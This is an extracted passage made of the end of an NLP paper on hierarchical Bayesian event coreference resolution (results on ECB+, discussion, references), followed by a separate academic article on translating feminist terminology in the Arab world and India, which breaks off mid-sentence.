the lower B3 F1, in particular, the decrease in B3 recall. This is because apply- ing the DDCRP prior at both within- and cross- document levels results in more conservative clus- tering and produces smaller clusters. This could be potentially improved by employing more accurate similarity priors. To further understand the effect of modeling mention-pair dependencies, we analyze the impact of the features in the mention-pair similarity model. Table 4 lists the learned weights of some top features (sorted by weights). We can see that they mainly serve to discriminate event mentions based on the head word similarity (especially embedding-based similarity) and the context word similarity. Event argument information such as SRL Arg1, SRL Arg0, and Participant are also indicative of the coreferen- tial relations. 6.4 Discussion We found that HDDCRP corrects many errors made by the traditional agglomerative clustering model (AGGLOMERATIVE) and the unsupervised genera- tive model (HDP-LEX). AGGLOMERATIVE easily suffers from error propagation as the errors made by the supervised distance learner cannot be cor- rected. HDP-LEX often mistakenly groups mentions together based on word co-occurrence statistics but not the apparent similarity features in the mentions. In contrast, HDDCRP avoids such errors by perform- ing probabilistic modeling of clustering and mak- ing use of rich linguistic features trained on avail- able annotated data. For example, HDDCRP cor- rectly groups the event mention “unveiled” in “Ap- ple’s Phil Schiller unveiled a revamped MacBook 525 MUC B3 CEAFe CoNLL P R F1 P R F1 P R F1 F1 Cross-document Event Coreference Resolution (CD) LEMMA 75.1 55.4 63.8 71.7 39.6 51.0 36.2 61.1 45.5 53.4 HDP-LEX 75.5 63.5 69.0 65.6 43.7 52.5 34.8 60.2 44.1 55.2 AGGLOMERATIVE 78.3 59.2 67.4 73.2 40.2 51.9 30.2 65.6 41.4 53.6 DDCRP 79.6 58.2 67.1 78.1 39.6 52.6 31.8 69.4 43.6 54.4 HDDCRP∗ 77.5 66.4 71.5 69.0 48.1 56.7 38.2 63.0 47.6 58.6 HDDCRP 80.3 67.1 73.1 78.5 40.6 53.5 38.6 68.9 49.5 58.7 Within-document Event Coreference Resolution (WD) LEMMA 60.9 30.2 40.4 78.9 57.3 66.4 63.6 69.0 66.2 57.7 HDP-LEX 50.0 39.1 43.9 74.7 67.6 71.0 66.2 71.4 68.7 61.2 AGGLOMERATIVE 61.9 39.2 48.0 80.7 67.6 73.5 65.6 76.0 70.4 63.9 DDCRP 71.2 36.4 48.2 85.4 64.9 73.8 61.8 76.1 68.2 63.4 HDDCRP∗ 58.1 42.8 49.3 78.4 68.7 73.2 67.6 74.5 70.9 64.5 HDDCRP 74.3 41.7 53.4 85.6 67.3 75.4 65.1 79.8 71.7 66.8 Table 3: Within- and cross-document coreference results on the ECB+ corpus Pro today” together with the event mention “an- nounced” in “this notebook isn’t the only laptop Ap- ple announced for the MacBook Pro lineup today”, while both HDP-LEX and AGGLOMERATIVE models fail to make such connection. By looking further into the errors, we found that a lot of mistakes made by HDDCRP are due to the errors in event extraction and pairwise linkage pre- diction. The event extraction errors include false positive and false negative event mentions and event arguments, boundary errors for the extracted men- tions, and argument association errors. The pairwise linking errors often come from the lack of seman- tic and world knowledge, and this applies to both event mentions and event arguments, especially for time and location arguments which are less likely to be repeatedly mentioned and in many cases re- quire external knowledge to resolve their meanings, e.g., “May 3, 2013” is “Friday” and “Mount Cook” is “New Zealand’s highest peak”. 7 Conclusion In this paper we propose a novel Bayesian model for within- and cross-document event coreference resolution. It leverages the advantages of genera- tive modeling of coreference resolution and feature- rich discriminative modeling of mention reference relations. We have shown its power in resolving event coreference by comparing it to a traditional ag- Features Weight Head Embedding sim 4.5 String match 2.77 Context sim 1.75 Synonym sim 1.56 TF sim 1.17 SRL Arg1 sim 1.10 SRL Arg0 sim 0.89 Participant sim 0.68 Table 4: Learned weights for selected features glomerative clustering approach and a state-of-the- art unsupervised generative clustering approach. It is worth noting that our model is general and can be easily applied to other clustering problems involving feature-rich objects and cluster sharing across data groups. While the model can effectively cluster ob- jects of a single type, it would be interesting to ex- tend it to allow joint clustering of objects of different types, e.g., events and entities. Acknowledgments We thank Cristian Danescu-Niculescu-Mizil, Igor Labutov, Lillian Lee, Moontae Lee, Jon Park, Chen- hao Tan, and other Cornell NLP seminar partici- pants and the reviewers for their helpful comments. This work was supported in part by NSF grant IIS-1314778 and DARPA DEFT Grant FA8750- 13-2-0015. The third author was supported by 526 NSF CAREER CMMI-1254298, NSF IIS-1247696, AFOSR FA9550-12-1-0200, AFOSR FA9550-15-1- 0038, and the ACSF AVF. The views and conclu- sions contained herein are those of the authors and should not be interpreted as necessarily represent- ing the official policies or endorsements, either ex- pressed or implied, of NSF, DARPA or the U.S. Government. References David Ahn. 2006. The stages of event extraction. In Proceedings of the Workshop on Annotating and Rea- soning about Time and Events, pages 1–8. Amit Bagga and Breck Baldwin. 1998. Algorithms for scoring coreference chains. In The First International Conference on Language Resources and Evaluation Workshop on Linguistics Coreference, volume 1, pages 563–6. Cosmin Adrian Bejan and Sanda Harabagiu. 2010. Un- supervised event coreference resolution with rich lin- guistic features. In ACL, pages 1412–1422. Cosmin Adrian Bejan and Sanda Harabagiu. 2014. Un- supervised event coreference resolution. Computa- tional Linguistics, 40(2):311–347. Indrajit Bhattacharya and Lise Getoor. 2006. A latent Dirichlet model for unsupervised entity resolution. In SDM, volume 5, page 59. David M. Blei and Peter I. Frazier. 2011. Distance de- pendent Chinese restaurant processes. The Journal of Machine Learning Research, 12:2461–2488. Claire Cardie and Kiri Wagstaff. 1999. Noun phrase coreference as clustering. In Proceedings of the 1999 Joint SIGDAT Conference on Empirical Methods in Natural Language Processing and Very Large Cor- pora, pages 82–89. Zheng Chen, Heng Ji, and Robert Haralick. 2009. A pairwise event coreference model, feature impact and evaluation for event coreference resolution. In Pro- ceedings of the Workshop on Events in Emerging Text Types, pages 17–22. Agata Cybulska and Piek Vossen. 2014a. Guidelines for ECB+ annotation of events and their coreference. Technical report, NWR-2014-1, VU University Ams- terdam. Agata Cybulska and Piek Vossen. 2014b. Using a sledgehammer to crack a nut? lexical diversity and event coreference resolution. In Proceedings of the 9th Language Resources and Evaluation Conference (LREC2014), pages 26–31. Greg Durrett and Dan Klein. 2013. Easy victories and uphill battles in coreference resolution. In EMNLP, pages 1971–1982. Soumya Ghosh, Andrei B. Ungureanu, Erik B. Sudderth, and David M. Blei. 2011. Spatial distance depen- dent Chinese restaurant processes for image segmen- tation. In Advances in Neural Information Processing Systems, pages 1476–1484. Soumya Ghosh, Michalis Raptis, Leonid Sigal, and Erik B. Sudderth. 2014. Nonparametric clustering with distance dependent hierarchies. Aria Haghighi and Dan Klein. 2007. Unsupervised coreference resolution in a nonparametric Bayesian model. In ACL, volume 45, page 848. Aria Haghighi and Dan Klein. 2010. Coreference reso- lution in a modular, entity-centered model. In NAACL, pages 385–393. Kevin Humphreys, Robert Gaizauskas, and Saliha Az- zam. 1997. Event coreference for information extrac- tion. In Proceedings of a Workshop on Operational Factors in Practical, Robust Anaphora Resolution for Unrestricted Texts, pages 75–81. Andrew Kehler. 2002. Coherence, Reference, and the Theory of Grammar. CSLI publications Stanford, CA. Dongwoo Kim and Alice Oh. 2011. Accounting for data dependencies within a hierarchical Dirichlet process mixture model. In Proceedings of the 20th ACM Inter- national Conference on Information and Knowledge Management, pages 873–878. Heeyoung Lee, Yves Peirsman, Angel Chang, Nathanael Chambers, Mihai Surdeanu, and Dan Jurafsky. 2011. Stanford’s multi-pass sieve coreference resolution sys- tem at the CoNLL-2011 shared task. In Proceedings of the Fifteenth Conference on Computational Natural Language Learning: Shared Task, pages 28–34. Heeyoung Lee, Marta Recasens, Angel Chang, Mihai Surdeanu, and Dan Jurafsky. 2012. Joint entity and event coreference resolution across documents. In Proceedings of the 2012 Joint Conference on Empir- ical Methods in Natural Language Processing and Computational Natural Language Learning, pages 489–500. Zhengzhong Liu, Jun Araki, Eduard Hovy, and Teruko Mitamura. 2014. Supervised within-document event coreference using information propagation. In Pro- ceedings of the International Conference on Language Resources and Evaluation. Xiaoqiang Luo. 2005. On coreference resolution perfor- mance metrics. In EMNLP, pages 25–32. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word represen- tations in vector space. Proceedings of Workshop at ICLR. Vincent Ng and Claire Cardie. 2002. Improving ma- chine learning approaches to coreference resolution. In ACL, pages 104–111. 527 Vincent Ng. 2010. Supervised noun phrase coreference research: The first fifteen years. In ACL, pages 1396– 1411. Sameer Pradhan, Xiaoqiang Luo, Marta Recasens, Ed- uard Hovy, Vincent Ng, and Michael Strube. 2014. Scoring coreference partitions of predicted mentions: A reference implementation. In ACL, pages 22–27. Karthik Raghunathan, Heeyoung Lee, Sudarshan Ran- garajan, Nathanael Chambers, Mihai Surdeanu, Dan Jurafsky, and Christopher Manning. 2010. A multi- pass sieve for coreference resolution. In EMNLP, pages 492–501. Altaf Rahman and Vincent Ng. 2011. Coreference reso- lution with world knowledge. In ACL, pages 814–824. Michael Roth and Anette Frank. 2012. Aligning pred- icate argument structures in monolingual comparable texts: A new corpus for a new task. In SemEval, pages 218–227. Sunita Sarawagi and William W. Cohen. 2004. Semi- markov conditional random fields for information ex- traction. In Advances in Neural Information Process- ing Systems, pages 1185–1192. Sameer Singh, Michael Wick, and Andrew McCallum. 2010. Distantly labeling data for large scale cross- document coreference. arXiv:1005.4298. Richard Socher, Andrew L. Maas, and Christopher D. Manning. 2011. Spectral Chinese restaurant pro- cesses: Nonparametric clustering based on similari- ties. In International Conference on Artificial Intel- ligence and Statistics, pages 698–706. Veselin Stoyanov, Nathan Gilbert, Claire Cardie, and Ellen Riloff. 2009. Conundrums in noun phrase coref- erence resolution: Making sense of the state-of-the- art. In Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP: Volume 2-Volume 2, pages 656–664. Mihai Surdeanu, Lluı́s Màrquez, Xavier Carreras, and Pere R. Comas. 2007. Combination strategies for se- mantic role labeling. Journal of Artificial Intelligence Research, pages 105–151. Yee Whye Teh, Michael I. Jordan, Matthew J. Beal, and David M. Blei. 2006. Hierarchical Dirichlet pro- cesses. Journal of the American Statistical Associa- tion, 101(476). Marc Vilain, John Burger, John Aberdeen, Dennis Con- nolly, and Lynette Hirschman. 1995. A model- theoretic coreference scoring scheme. In Proceed- ings of the 6th Conference on Message Understanding, pages 45–52. Michael Wick, Sameer Singh, and Andrew McCallum. 2012. A discriminative hierarchical model for fast coreference at large scale. In ACL, pages 379–388. Travis Wolfe, Mark Dredze, and Benjamin Van Durme. 2015. Predicate argument alignment using a global coherence model. In NAACL, pages 11–20. Bishan Yang and Claire Cardie. 2014. Joint modeling of opinion expression extraction and attribute classifi- cation. Transactions of the Association for Computa- tional Linguistics, 2:505–516. 528 work_dh2iacdeezc77or4t64s2wnxoy ---- untitled O P E N A C C E S S Research article Instigating social change: Translating feminism in the Arab world and India Alanoud Alsharekh* ABSTRACT The most common accusation levelled at those working in gender studies in the Arab world is tied to the fact that they are commonly viewed as dealing with a “Western” concept; corrupting the cultural and traditional value system of the Arabo-Islamic heritage of the region. Linguistic resistance to this field is an obvious impediment to its progression, with a range of dissatisfactory and often conflicted terminology meant to distance the language from the very concept of feminism: Nassawiyar Unthawiya, both alien-sounding and cumbersome. Engaging in the act of translation in a linguistic and cultural vacuum means that the translator becomes an active agent in developing and shaping concepts associated with Feminism, while simultaneously conveying the social and moral values that are associated with the quest for female empowerment in the West. This same burden of shaping concepts and creating them while actively engaging in the act of translation was faced by Indian translators of feminism and those working in the field of gender studies beforehand. This paper will attempt to look at the experience of the importance of translation in the field of gender studies in the developing world and the similar hurdles and triumphs that were experienced by those working in the field in India and in the Arab Middle East. Keywords: comparative feminism, translation, India, Arab Cite this article as: Alsharekh A. Instigating social change: Translating feminism in the Arab world and India, QScience Connect (Special Issue on Translating the Gulf: Beyond Fault Lines) 2016:tii.2 http://dx.doi.org/10.5339/connect.2016.tii.2 http://dx.doi.org/ 10.5339/connect.2016.tii.2 Submitted: 9 July 2015 Accepted: 15 December 2015 ª 2016 Alsharekh, licensee HBKU Press. This is an open access article distributed under the terms of the Creative Commons Attribution license CC BY 4.0, which permits unrestricted use, distribution and reproduction in any medium, provided the original work is properly cited. Women’s Study and Research Center, Kuwait University *Email: aalsharekh@gmail.com INTRODUCTION In a broad sense, feminist theory and feminism have been institutionalised in the West, and have garnered credibility through the different scholarly approaches that have interacted with and built upon the canon. As a social and political movement it has a clearly delineated trajectory, with the emergence of manifestos that demanded equal rights for women, by women, around the tail end of the 18 th century in Europe. The Indian experience entailed similar demands for a change in the status of women around the end of the 19 th century, but like Arab feminism, this had its roots in both colonialist demands for an end to ‘barbaric’ practices against women, and a newly educated male elite that wanted to improve the condition of women but not necessarily emancipate them. So calls for educational reform in India were in a similar vein to Qasim Amin’s call for educating the “mothers of the nation” in Egypt (Amin, 1900) This brings us to the two main ideas that will be discussed in this paper; firstly that the translation of feminist texts in India and the Arab world involves the invention of new terms and terminologies that are introduced alongside the translated concepts. This process is compounded in both regions by the post-colonial baggage of the feminist movement, and its early adoption by men who had different agendas than the feminists themselves. Secondly, translators in both regions become active instigators of social disruption, and can either hold back, or expedite the dissemination of feminist ideas and their absorption into the local culture through the terminology they choose to use, and whether it is a “faithful” meaning literal, or a “grounded” meaning practical, translation as J. Devika named them (Devika, 2008). In the same way that Bassnett and Trivedi argue that “translation does not happen in a vacuum, but in a continuum..[as] part of an on-going process of intercultural transfer” (Bassnett & Trivedi, 1999, p.2), feminist translation develops both from the theory of gender biased responses, and the activism side of the movement. Therefore it is in a constant state of flux, absorbing and building on developments in the socio-political sphere. Re-examining Juliet Mitchell’s description of feminism as “the longest revolution” (Mitchell, 1984) in the context of translation, we would find revolutions within the feminist tract itself. While the position of euro-centric feminists centred on the assumption of the universal suppression of women, with first and second wave feminists likening their position to that of other disenfranchised groups, “the Jews and the Blacks” as Simone de Beauvoir put it in The Second Sex (De Beauvoir, 2011, p.290), later waves revolted against this idea of a uniform female experience. While Marxist feminists were in revolution against the social hierarchies inherent in first wave arguments, feminists of non-white ethnicities were in revolt against the insidious racism of white feminist discourse. The translator of feminist tracts, in dealing with multiple layers of feminist ideology and cultural meanings, can also be placed as a direct agent of this feminist revolution. Especially since those translating feminist concepts are likely to also be those who are engaging in feminist acts, at the very least, in gynocriticism. The Canadian poet and translator Erin Moure argues that, “Choosing what to translate is a political act, it’s a community act. It’s an act that’s culturally constructed” (Moure, 2012) but translating in the Arab world and India is, to quote Spivak (1999) “often a political exercise of a different kind” (p.406). In both regions the translator is dealing with a multitude of ethnically different political and cultural ideologies that have brushed up against global ones and embraced them at a point in time, such as communism in the south of the Indian subcontinent, and the socialist regimes in Iraq, Syria and Egypt. Both regions have a high formal language and different dialects that act as everyday languages coloured by geographical influences outside its borders. Both are especially hostile to feminist intervention and have been accused of backward practices by Western observers since the beginning of the state formation project in the 1950s and 1960s. Of course, India’s size, population and industrial prowess places it far ahead of the Arab Middle East in terms of the sheer volume of feminist output, and the national recognition of a leadership figure in Indira Ghandi, although it has yet to be repeated again, places it in a more advanced cognitive space in feminist terms than the Arab-speaking world. The homogeny of India as a subcontinent is also markedly different than the many Arab identities that make up the twenty-one countries of the Arab world, especially after the post-liberation statehood projects began to get involved in the national identity manufacturing process. The latter meant that the legal and social position of women progressed at widely differing rates in the various Arab countries, and thus produced a varying range of engagements with feminist thought, texts and translations. Lastly India has established matrilineal and supposedly matriarchal societies (such as the Khasis of North East India and the now no longer practiced Marumakkathayam inheritance system in Kerala) whereas the Arab states have no such practices in their socio-cultural history. Page 2 of 8 Alsharekh. QScience Connect 2016:tii.2 TRANSLATING A UNIVERSAL STRUGGLE According to Jeremy Munday (2009) feminist engagement with the act of translation has focused on four main concerns (p.192). The first, which both Indian and Arab writers have not engaged with enough, centers around uncovering the role of female translators themselves and their historical limitations. However the dearth of academic texts on the issue of female translators can be compensated by Arab writers such as Fatima Mernissi’s attempts to challenge the traditional historical relegation of women to the side-lines with books such as The Forgotten Queens of Islam (Mernissi, 1994), and the many anthologies and volumes written on uncovering the misrepresented history of women in India. This ties in with the second concern, which attempts to dismantle the ideological and historical correlation of translation with traditional gender construction, so that the feminist translator is not only instigating social change but uncovering the traditional reasons behind the status quo, and much of the third concern, that of critiquing the translation of feminist texts falls into this category. The last concern, that of gendered language and choosing what gender biases and societal practices to omit or include in a specific text is perhaps the one that the post-colonialist feminist translator in the Arab world and India struggles with most. The problem with traditional feminist translation theory is in its insistence on the lowly status of both feminism and translation. Sherry Simon (1996) saw that the literary view on translated texts as derivative of and inferior to the original text is similar to how women were repressed and relegated to a less prominent role in society and literature. She advocated an adherence to a feminist translation project by which “feminist translators openly advocate and implement strategies (linguistic or otherwise) to foreground the feminist in the translated text.” (Hatim & Munday, 2004, p.105). This leads to what Lori Chamberlain (1988) calls the “sexualisation of translation” and requires the translator and the original author to engage in a subversive collaboration to restore or uncover the hidden feminist message that has been previously suppressed. Here the translator, who these theorists argue is lesser than the creator of the original text, is able through the act of translation to undermine the sexist marginalisation and engage in the creative process of “liberating” the feminine, much like the social act of women’s emancipation. Although both translators of feminist texts in India and the Arab world cannot avoid a form of this re- inventive process the idea of starting off from an inferior position (that of woman, or that of translator) can get prickly in a post-colonial setting, where the sensitivities towards this type of cultural positioning can run especially high. Chakravarty (2015) states that: Yet, this overlooks the fact that a preoccupation with “fidelity” or “authenticity” was not part of the tradition in India before colonial times. Ours was a polyglot culture with a strong oral tradition, and linguistic and regional borders were fluid; in this scenario, it was inevitable that texts should travel in translation (p. 26). This description also works for the nature of translation in the Arab world. In fact, there was no belief in the inferiority of the translator, who was seen as an essential vessel to transmit a foreign culture’s knowledge into Arabic whether at the time of the Islamic Empire expansion, or during colonial occupation when the printing presses allowed for a wider dissemination of Western texts (Al-Khalili, 2012). As women in both India and the Arab world continue to explore feminist texts and translations, the lack of organic and home-grown feminist translation theories will be supplanted and replaced by those starting from a viewpoint that is more authentic and less concerned with the Western perception of translation and more concerned with the “fluidity” of texts in regions historically immersed in multi-cultural exchanges. FEMINIST PERCEPTIONS IN TRANSLATION Examining the translated choices in the Arabic language and in India’s regional languages gives us a vivid example of this protracted wrangling between translating the social act and actually engaging in social action. Feminism is deeply rooted in social service and social justice, and therefore contains an implicit invitation to overthrow existing social systems that are oppressive to women as a weaker social group. The universal application of the gender issue frames the national in the international, the personal in the political, thereby making the implicit call for action, an explicit one. Feminism’s disruptive properties in traditional Indian and Arab societies caught up in preserving “family values” that centre on inherited sexual hierarchies and gender roles can be seen in its challenging of attitudes, behaviours, laws, policies and institutional frameworks that seek to keep women occupied within a rigidly controlled domestic space. In the shift from source to translated Page 3 of 8 Alsharekh. QScience Connect 2016:tii.2 language feminism’s focus on inclusion, fairness and equal opportunity and it’s challenges to notions of manhood, gender, language and family are subjected to critical analyses by the interpreter. As Simon (1996) put it “complicities between gender and translation become the basis of a consciously transformative project” (p.6). Those working in gender studies in India and the Arab world are viewed as dealing with a “Western” concept with an imperialist agenda; corrupting the cultural and traditional value system of the indigenous heritage of the region. The cultural rejection of feminist discourse derives a lot of its power from labeling it an “imported” problem. Linguistic resistance to this field is one of the more obvious impediments to its progression, with a range of dissatisfactory and often conflicted terminology meant to distance the language from the very concept of feminism. The Arabic “Nissawiya” or “Unthawiya”, both provide incomplete descriptions of feminism as they focus on the biological aspect and disregard the more encompassing feminist “world view”. When figures such as Alice Walker reject “feminism” as a white women’s term and replace it with Womanism, this creates an ever-larger dilemma for the translator by forcing them to take a side in the on-going debate . . . which Arabic “iya” to go with which English “ism”? The Indian term “Streevadam” is a similar reduction to the literal meaning of “argument on behalf of women”, which fails to convey the spectrum of feminist concerns. Devika (2008) argues that both the emphasis on literal interpretations and the conservative nature of the local community which “discourages the active discussion of themes like sexuality, very often decides the limits of feminist innovation in language” (p.184). This becomes more complicated as developments in Western feminism push the limits of linguistic and cultural flexibility further with concepts such as “intersectionality”, “gender-queer” and “femi-nazi”, which may not be suitable or useful in the current social climate of the target language. THE BURDEN OF TRANSLATION At present, the field of gender studies seems to be in a translation transition. Devika (2008) claims that the word “Gender” started to appear in the popular discourse of Indian development and decentralisation in the 1990s, as it was seen as less divisive than feminism. The most commonly used term, “lingapadavi”, merely means “the status of sex”. In India and the Arab world, naming the field of gender studies is a problem in itself because sex as a socio-cultural issue and sex as biologically determined were rarely considered as separate enough to merit different words before the advent of translated feminism. Al-Dabbagh and Ramadan (2013) make the same claim for the use of “Gender” as a less divisive term in the Arab world, and explain how many Arab feminists rejected it because of this shift in focus from women to the more inclusive “women and men”. As more and more Universities and independent researchers in the Arab world engage with the study of gender and feminism, the usage will probably evolve and normalise so that its not as alien-sounding as SaadalBazie’s (2014) suggestion “Jinthawiyah”, or the more common obtuse term “al-no’a al Ijtima’ee”, or the lazy and odd sounding “Jandarah”. Spivak (2004) examines the awkwardness and relative novelty of the words gender and gendering in the English language itself, and quotes the Bangladeshi activist and author Farida Akhter as complaining that “the real work of the women’s movement and of feminism is being undermined by talk of “gendering”, mostly by the women’s development wings of transnational nongovernment organisations, in conjunction with some local academic feminist theorists” (Spivak, 2004, p.146). Similarly, the United Nations programs have tried to push the word “Jinsaniyah” as the Arabic version of gendering, a mixture of the word for humanity “Insanniyah” and that for sex “Jinss”, and it has so far resisted adoption outside of the organisation. Besides the different psychological burdens of post-colonialism that Indian and Arab feminist discussions start off from, there is the obvious gap in theoretical background. Although there has been many interesting and valid publications in the past four decades that dealt with comparative, Islamic and the unfortunately named Third world feminism, the main theoretical underpinnings of mainstream Feminist thought and critical approaches comes from two Western, liberal humanist schools of thought; Anglo-American feminism, which deals mostly in biology, and the French feminist school, which divorces feminism from the biological state of womanhood, so that both men and women can be feminist in their writings and their outlook. Both approaches rest on the exaltation of the culture of the individual, and individual rights, which is problematic when dealing with cultures where collectivism, and communal harmony are the ideological basis such as India and the Arab countries. This can make the most simplistic of feminist exchanges lose their meaning, and makes it difficult to translate even the most basic concepts that are essential to the feminist theoretical lexicon, like the word “patriarchy”. Page 4 of 8 Alsharekh. QScience Connect 2016:tii.2 Patriarchy, in its etymology, has Greek roots, and in social relevance, is associated with the orthodox Christian concept of an ultimate father, a “Patriarch”. In an increasingly secularised West, institutionalised control based on male authority, like that exercised by the church over its faithful followers, is easily accessed in “Patriarchy’s” metaphoric repressive and restrictive elements. However, when one uses this word in Arabic, its Christian overtones lose their oppressive suggestive powers and become another manifestation of “foreignness” outside the minority of Arab Christians who engage daily with the term. Patriarchy, which is central to the universal themes of hierarchal and institutionalised male dominance, is often translated into the more Arabic sounding “Abbawiyah”, or “Thukooriyah”, derived from the Arabic word for father and male respectively. At any time, when the translator designates who is meant by Patriarchy, it is inevitable that he or she are also designating an enemy. The “Patriarch”, be he the father, the male sex or the foreign sounding and vehemently Christian Patriarchy has now been named and shamed in the translated Arabic as the root cause of female oppression. Another kind of ethical dilemma emerges for those translating the same term in the different regions of India. Should patriarchy be translated into high language, like the Malayalan term “pitrmedhavitvan”, with its upper caste social implications or alternatively, the more accessible and socially egalitarian “aankioma” 1 ? As Devika (2008) points out, High Malayalam is deeply influenced by Sankrist and divorced from everyday speech, similar to the problems of translating feminist terminology into Classical Arabic, without even addressing the linguistic minefield for a feminist translator in the inherent favouring of the male sex in the grammar of the language itself. This problem of the sexist nature of language itself has been faced by those outside the field of feminist translation, but more recently, scholars from the Arab world and India have started to explore this relationship and its impact on the social contract and gender roles. Fatima Sadiqi (2002) argues that language is an important component of social power that often works in ways that undermine female empowerment. The same argument for this inherent gender bias has been made by both Indian scholars and Western scholars with varying degrees of argumentation on how much this then effects the socio-political positioning of women within a particular linguistic community. CULTURAL DOMINANCE AND FEMINIST TRANSLATION Part of the feminist activist and translation movement has attempted to co-opt the overarching male subtext of literary tracts through having dedicated publishing houses looking into the lost “feminist” text. Kothari (2014) suggest that: A more tangible interlocking of gender and translation is visible in “small” and “niche” presses focusing upon women’s texts. In India, Stree and Kali for Women undertake translation on a wide scale as a means to access women’s voices (p.43). Similarly Noor Publishing House in Egypt, was dedicated mainly to the output of female authors, and was the organising impetus behind the 1995 Arab Women’s Writer Book Fair in Cairo. Valentine Moghadam (2003) argues that publications such as Al-Raida, a quarterly feminist journal published by the Institute of Women’s Studies in the Arab World of the Lebanese American University which has been operating since 1976 is “another way that MENA women have been contributing to civil society . . . through literary efforts, including the publication of books, journals and films” (p.284). In the Arab world, Western interest in women’s writing specifically, perhaps as a result of the orientalist infatuation with the “oppressed” female figure, and this has resulted in many translated feminist novels and anthologies dedicated to Arab women’s writing (Boothe, 2002, p.410). Yet, even this can be a thorny issue because of the choice of which writer to translate can be driven by either commercial or sensational drivers that may not always have an essentially Arab feminist concern. Garnet Publishing House in London dedicated a series of publications edited by Fadia Faqir dedicated solely to Arab Women Writers, and although she argues that Western interest and exposure is ultimately a good thing, Amal Amireh (1996) argues that there is an element of cultural domination involved in translating feminist works: To understand the problem Arab women writers face we need to look at the long and complex history of their reception in the West. Historically, the West’s interest in Arab women is part of its interest in and 1 Both words mean patriarchy in Malalayam, according to J. Devika (2008): “Aankioma is now widely used in Malayalam for patriarchy, as an alternative to Pitrmedhavitvan. In a sense this is really the implicit recognition of the impossibility of homolingual address assumed by much translation - of the fact that the presence of a national language does not mean it is equally available to all nationals alike.” Page 5 of 8 Alsharekh. QScience Connect 2016:tii.2 hostility to Islam. This hostility was central to the colonialist project, which cast women as victims to be rescued from Muslim male violence. The fixation on the veil, the harem, excision, and polygamy made Arab women symbols of a region and a religion that were at once exotic, violent, and inferior. (p.32). This holds true for the darling of Western translation Nawal al Saadawi’s work, and especially her fiction which is often described as subpar by her peers and other Arab women writers. Spivak (2004) warns of this desire to be all-embracing as a feminist translator, cautioning that a good translator “must have a tough sense of the specific terrain of the original, so that she can fight the racist assumption that all third world women’s writing is good” (p.147). The colonial context challenges the universality of feminist translation in another way. Spivak (2004) argues that it is not always empowering to the feminist writer to be pigeonholed into a cultural space through the medium of translation: “I am often approached by women who would like to put Devi in with just Indian women writers. I am troubled by this because “Indian Women” is not a feminist category . . . There is an ethnocultural agenda, an obliteration of third world specificity as well as a denial of cultural citizenship, in calling them merely “Indian” ” (p.147). This also holds true for many Arab women writers who write in English and French and yet cannot be seen as part of a Western cannon. Yet, Spivak and others in the postcolonial feminist field examined how translation could become a vehicle of feminist solidarity. By engaging in the act of translation in a linguistic and ideological vacuum the translator becomes an active agent in developing and shaping target language concepts associated with Feminism, while simultaneously conveying the social and moral values that are associated with the quest for female empowerment in the West. This burden of feminist creation was used to counter accusations of being mere vessels of a racist system that uses women’s issues to attack local culture and traditions. Essays like “Why Kali wont rage” (Banerji, 2012) and Leila Ahmad’s arguments on colonialism and Islam (Ahmed, 1992, p.243) attempted to re-address the feminist position by offering alternative narratives to the colonialist emphasis on backward practices in the colonies, such as the emphasis on the practice of Sati (the funeral ritual of widow suicide by burning) in India, or through exposing the hypocrisy of Lord Cromer’s pro-female emancipation position in Egypt while he headed the anti-suffragette league in Britain. Decades later these same issues are still being challenged and re-addressed by Arab and Muslim feminists in a post 9–11, post-ISIL world, against the reductionism of what Evelyn alSultany (2012) describes as “the politics of pity” and within the messy ethics of cultural relativism when the plight of women continues to be highlighted by invading Western forces like the US presence in Afghanistan (Abu-Lughod, 2002: p. 783). CONCLUSION: POST-POST COLONIST APPROACHES “Translating Feminism” was the subject of a public conversation that took place at the MOMA New York in November 2014. Artists and activists from Latin America, Poland and India were brought together to discuss how feminism has often been derided as a bourgeoise pursuit, out of touch with more urgent concerns in the context of political oppression and dictatorship. Equally in the Arab world and India, there is a sense of frivolity and privilege associated with feminism in an impoverished and political unstable part of the world. Pandey (1989) argues that for Indians “where inequality has been institutionalised in a hierarchal manner, the concepts of individual equality and freedom are new and being offered from above” (p.13), and the same high brow accusation has been levelled at Arab feminist scholars such as Nawal al Saadawi and Fatima al Mernissi, who find much more credibility and respect in the West than in the Arab world as experts in their field. Researchers from the global south, another unfortunate sweeping name, tried to engage with Latino, African and Asian discourses that dismantle the idea that feminism is purely an imported Western concept (though as this essay proves, it is nearly impossible to have a south-south dialogue that doesn’t in some way reference a “Northern” theoretical base). Audre Lorde’s (1984) famous essay on how the Master’s tools will never dismantle the Master’s house will continue to drive some aspects of indigenous and post-colonial feminism, but as grass-root movements take hold and those arguments are subsumed within the relentless internationalism that the world wide web forces on us, these concerns are starting to wane in importance. SAFAR, the Sikh Feminist Research Institute seeks to promote and sustain Sikh feminist “research, praxis and activism” through realising the “Sikh Gurus’ principles of egalitarianism and empowerment”. SAFAR is based in Canada and communicates mostly in English, further proof that to find an indigenous feminist rhetoric, or to re-write a more gender Page 6 of 8 Alsharekh. QScience Connect 2016:tii.2 balanced regional history undistorted through patriarchal practices, an engagement with the language or the tools of the Other, of the West, is often necessary. Another example of moving on from the constraints of post-colonial feminism is Kohl, a new journal that engages with the body in Arabic, French and English. Kohl invites contributions that explore issues of gender and sexuality in the Arab Middle East even as the language and the region are not yet able to accommodate this conceptually evolved foray. Estaygazat is an online Syrian feminist platform that started in 2014, that in spite of its anti-Assad stance and its focus on protest, is being attacked as distracting from the main issues (Gebeily, 2015). Its discourses are condemned as shameful and emulating the West because it chooses to engage with the body as Western feminists had done before. The evocative name “she has awoken” is part of what Devika (2008) calls “retrieving . . . local terms or usages, or coining new ones . . . interpreting them in the light of western political ideas and concepts . . . and strategically deploying them in political discourse.” Devika (2008) gives the example of a term coined by Anna Chandy “adukkalavadam” which can be roughly translated to “kitchenism”, an attempt at highlighting how “the emergent modern patriarchy in Kerala allowed a degree of mobility to women and access to paid work, but essentially tied them to domestic concerns.” Another example would be the favouring of the term “MunadhilahHugoogiyah” by Arab feminists, which simply means “Rights activists”, rather than any of the agreed upon translations of the word feminist. Two Indian girls released a rap video in March 2015 which quickly went viral (which echoed a 2013 sarcastic YouTube video by Indian actresses called Rape: It’s your Fault), denouncing the complicity of the Indian authorities in covering up incidents of rape (Cohen, 2015). The girls focused on the use of the term “eve-teasing” in India instead of the more powerful and accusatory “sexual harassment” and this is the “grounded” activist feminism that awaits us while we struggle to find linguistic 